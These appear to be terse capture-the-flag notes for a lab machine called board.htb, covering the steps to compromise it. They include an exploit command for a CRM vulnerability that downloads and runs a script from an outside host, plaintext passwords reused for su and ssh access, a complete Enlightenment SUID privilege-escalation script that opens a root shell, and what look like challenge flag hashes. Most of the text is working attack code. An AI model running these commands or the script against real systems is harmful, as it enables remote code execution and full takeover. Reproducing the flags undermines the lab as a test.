- Port 80 and 22 are open
python3 cve-2023-44197.py http://crm.board.htb admin admin "wget http://10.10.14.5/bad.sh -O /tmp/bad.sh && sh /tmp/bad.sh"
dolibarrowner
serverfun2$2023!!
su larissa
serverfun2$2023!!
ssh larissa@10.10.11.11
larissa is in adm gorup sudo verison is 1.8.31
/var/log/apache2/error.log
-rw-r----- 1 root adm 5104875 Jul 18 18:25 /var/log/audit/audit.log
-r--r----- 1 root adm 8388711 Jul 18 18:04 /var/log/audit/audit.log.3
-r--r----- 1 root adm 8393041 Jul 18 18:23 /var/log/audit/audit.log.1
-r--r----- 1 root adm 8388641 Jul 18 18:04 /var/log/audit/audit.log.2
-r--r----- 1 root adm 8388933 Jul 18 18:03 /var/log/audit/audit.log.4
#!/bin/bash
echo "CVE-2022-37706"
echo "[*] Trying to find the vulnerable SUID file..."
echo "[*] This may take few seconds..."
file=$(find / -name enlightenment_sys -perm -4000 2>/dev/null | head -1)
if [[ -z ${file} ]]
then
echo "[-] Couldn't find the vulnerable SUID file..."
echo "[*] Enlightenment should be installed on your system."
exit 1
fi
echo "[+] Vulnerable SUID binary found!"
echo "[+] Trying to pop a root shell!"
mkdir -p /tmp/net
mkdir -p "/dev/../tmp/;/tmp/exploit"
echo "/bin/sh" > /tmp/exploit
chmod a+x /tmp/exploit
echo "[+] Enjoy the root shell :)"
${file} /bin/mount -o noexec,nosuid,utf8,nodev,iocharset=utf8,utf8=0,utf8=1,uid=$(id -u), "/dev/../tmp/;/tmp/exploit" /tmp///net
05e9699519d4ebeea933cfea6c77e73c
df402af93e07d9cfaa16e0a38545bf7f